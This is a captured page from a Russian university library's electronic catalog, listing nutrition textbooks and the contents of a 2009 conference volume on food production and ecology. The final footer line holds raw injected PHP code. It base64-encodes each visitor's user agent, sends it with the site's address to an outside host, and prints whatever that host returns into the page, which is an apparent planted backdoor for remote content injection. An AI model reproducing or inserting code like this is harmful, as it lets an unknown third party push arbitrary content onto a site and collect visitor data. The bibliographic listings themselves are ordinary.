Система пищеварительная -- ПИЩА -- ПИЩЕВАРЕНИЕ -- БЕЛКИ - ПИТАНИЕ -- ЛИПИДЫ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- ВИТАМИНЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАН -- МИКРОНУТРИЕНТЫ -- ПИТАНИЕ СБАЛАНСИРОВАННОЕ -- РАЦИОН ПИТАНИЯ -- РЕЖИМ ПИТАНИЯ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- ПИТАНИЕ ГЕРОДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕ -- ПРОДУКТЫ МЯСНЫЕ - Питание -- ПРОДУКТЫ РЫБНЫЕ - Питание -- ПРОДУКТЫ МОЛОЧНЫЕ - питание -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ОЖИРЕНИЕ - ПРОФИЛАКТИКА -- кариес - профилактика -- ВЕГЕТАРИНСТВО -- СЫРОЕДЕНИЕ -- ПИТАНИЕ РАЗДЕЛЬНОЕ -- ГОЛОДАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ - ЗДОРОВЬЕ -- Питание - Группа крови
Держатели документа (Информация об экземплярах) 
10. 
Матюхина З. П. Основы физиологии питания, микробиологии, гигиены и санитарии [Текст] : учеб. для образоват. учреждений нач. проф. образования / З. П. Матюхина, 2007. - 206 с.
11. 
Социально-экономические и правовые проблемы развития информационного общества [Текст] : материалы междунар. научно-практ. конф., 30 сент. 2009 г. В 5 т. Т. 5. Проблемы экологии и развития индустрии питания в современном обществе / М-во образования Омской обл., Администрация г. Омска, Региональное объединение работодателей Омской обл., Карагандинский ун-т "Болашак" (Республика Казахстан), Бишкекская финансово-экон. акад. (Кыргызская Республика), Сиб. ин-т бизнеса, управления и психологии, г. Красноярск, Омский экон. ин-т, 2009. - 150 с.
Ключевые слова 
Оглавление 
  • Беспалова, Т. А. Влияние биологически активных веществ на иммунный статус норок при алеутской болезни и иммуннодефицитных состояниях / Т. А. Беспалова, Е. А. Хитрова, О. А. Приступа. - с.7-15
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ, БОЛЕЗНЬ алеутская, ИММУНИТЕТ
  • Богачева, А. А. Здоровое питание подростков в условиях Крайнего Севера / А. А. Богачева, А. И. Турова. - с.15-18
    Кл. слова: ПИТАНИЕ ПОДРОСТКОВ, ПИТАНИЕ ЗДОРОВОЕ
  • Бураковская, Н. В. Актуальные вопросы производства плавленых сырков / Н. В. Бураковская. - с.18-21
    Кл. слова: СЫР ПЛАВЛЕНЫЙ, ПРОИЗВОДСТВО сыра
  • Вальтер, Г. Ф. Технология приготовления творога на основе подсгущеного молока / Г. Ф. Вальтер, П. А. Лисин. - с.21-23
    Кл. слова: ТВОРОГ, ДЕСЕРТ творожный, ПРОИЗВОДСТВО творога
  • Германская, Л. Г. Товароведческая оценка сырного продукта / Л. Г. Германская. - с.23-27
    Кл. слова: СЫР, КАЧЕСТВО сыра
  • Гришина, Е. С. Разработка и оптимизация рецептуры кисломолочного продукта с растительным наполнителем / Е. С. Гришина. - с.27-32
    Кл. слова: ПРОДУКТ КИСЛОМОЛОЧНЫЙ, НАПОЛНИТЕЛЬ растительный
  • Должанкин, В. С. Выбор способов очистки отработанных нефтепродуктов, применяемых в дорожно-строительной технике / В. С. Должанкин. - с.33-41
    Кл. слова: НЕФТЕПРОДУКТЫ, СЫРЬЕ ВТОРИЧНОЕ
  • Жигалкина, Т. С. Проблемы школьного питания учащихся / Т. С. Жигалкина. - с.42-46
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Жидкова, О. Н. Пищевые волокна в производстве молочных продуктов / О. Н. Жидкова. - с.46-50
    Кл. слова: ВОЛОКНО ПИЩЕВОЕ, ПРОИЗВОДСТВО МОЛОЧНОЕ
  • Завгородняя, Л. М. Йодированные молочные белки / Л. М. Завгородняя. - с.51-62
    Кл. слова: БЕЛОК - ПИТАНИЕ, ПРОДУКТЫ ЙОДИРОВАННЫЕ, ЙОД - ПИТАНИЕ
  • Изосимова, И. В. Влияние выжимок ягод на гидролитические изменения в мясорастительных паштетах / И. В. Изосимова, О. М. Сергачева, А. М. Тимофеева. - с.62-65
    Кл. слова: ПАШТЕТ, ВЫЖИМКА ягодная
  • Каня, И. П. Некоторые сведения о «Herbalife» / И. П. Каня. - с.65-70
    Кл. слова: Herbalife
  • Кащеева, Н. Л. Перспективы использования белково-углеродного сырья в производстве функциональных продуктов / Н. Л. Кащеева. - с.71--72
    Кл. слова: СЫРЬЕ белково-углеводное, ПРОИЗВОДСТВО МОЛОЧНОЕ
  • Королев, А. Н. Качество растениеводческой продукции в условиях техногенного дисбаланса химического состава почвы / А. Н. Королев. - с.73-78
    Кл. слова: БИОХИМИЯ
  • Королев, А. Н. Прогнозирование использования осадков сточных вод в растениеводческих хозяйствах с целью получения экологически безопасных продуктов / А. Н. Королев. - с.78-83
    Кл. слова: ПОЧВА - ЭКОЛОГИЯ, ПРОДУКТЫ ЭКОЛОГИЧЕСКИ ЧИСТЫЕ
  • Лапшинская, Н. А. Влияние молочной сыворотки на качество и безопасность низкокалорийных майонезов / Н. А. Лапшинская, Н. А. Драгун, М. М. Щукина. - с.83-89
    Кл. слова: СЫВОРОТКА молочная, МАЙОНЕЗ
  • Макарова, О. В. Разработка и исследование молочно-растительных систем / О. В. Макарова, О. В. Пасько. - с.89-92
    Кл. слова: ПРОДУКТЫ МОЛОЧНЫЕ, ИССЛЕДОВАНИЕ молочно-растительных систем
  • Мартемьянова, Л. Е. Термодинамический индекс термостабильности пищевых продуктов / Л. Е. Мартемьянова, П. А. Лисин. - с.92-96
    Кл. слова: ИНДЕКС термодинамический, ТЕРМОСТАБИЛЬНОСТЬ пищевых продуктов
  • Мартемьянова, Л. Е. Оценка активности воды пищевых продуктов / Л. Е. Мартемьянова, Г. Ф. Вальтер, П. А. Лисин. - с.97-101
    Кл. слова: ВОДА - ПИТАНИЕ
  • Маюрникова, Л. А. Формирование рынка продуктов специального назначения / Л. А. Маюрникова, Е. В. Санжаровский, Н. В. Горникова. - с.101-105
    Кл. слова: ПРОДУКТЫ специального назначения, КУЛЬТУРА ПИТАНИЯ
  • Миллер, М. А. Индустрия питания и здоровье населения в современных условиях / М. А. Миллер. - с.105-110
    Кл. слова: ИНДУСТРИЯ ПИТАНИЯ, ПИТАНИЕ - ЗДОРОВЬЕ
  • Молибога, Е. А. Безопасность продовольственного сырья и пищевых продуктов как одна из основных составляющих их качества / Е. А. Молибога. - с.111-114
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ
  • Неверов, Е. Н. Применение упаковки при охлаждении диоксидом углерода птицы / Е. Н. Неверов. - с.114-117
    Кл. слова: МЯСО охлажденное, ОХЛАЖДЕНИЕ
  • Никишина, И. Н. Возможности создания сегмента молочных продуктов из козьего молока в индустрии питания России / И. Н. Никишина, С. В. Симоненко, С. Е. Димитриева. - с.117-121
    Кл. слова: МОЛОКО козье
  • Петрова, Л. В. О безопасности и качестве сухого молока в процессе распылительной сушки / Л. В. Петрова, С. В. Петрова. - с.122-123
    Кл. слова: СУШКА распылительная, МОЛОКО сухое
  • Погребняк, А. И. Бизнес ресторанных услуг и проблема питания сибиряков на рубеже XX – XXI вв / А. И. Погребняк. - с.123-133
    Кл. слова: БИЗНЕС РЕСТОРАННЫЙ
  • Приступа, О. А. Ультраструктурная характеристика патологического процесса в центральной нервной системе животных при аутомутиляции / О. А. Приступа, Т. А. Беспалова. - с.134-139
  • Пронович, О. Н. Ценностный аспект глобального экологического кризиса / О. Н. Пронович. - с.140-142
    Кл. слова: КРИЗИС ЭКОЛОГИЧЕСКИЙ
  • Шадрин, М. А. Пищевая комбинаторика как фактор решения проблем при разработке новых технологий продуктов питания / М. А. Шадрин. - с.146-148
    Кл. слова: КОМБИНАТОРИКА
Держатели документа (Информация об экземплярах) 
12. 
Матюхина З. П. Основы физиологии питания, гигиены и санитарии [Текст] : Учеб. / З. П. Матюхина, 2001. - 181 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3080 - 15.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.85 с.16 запросов, 0.55c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;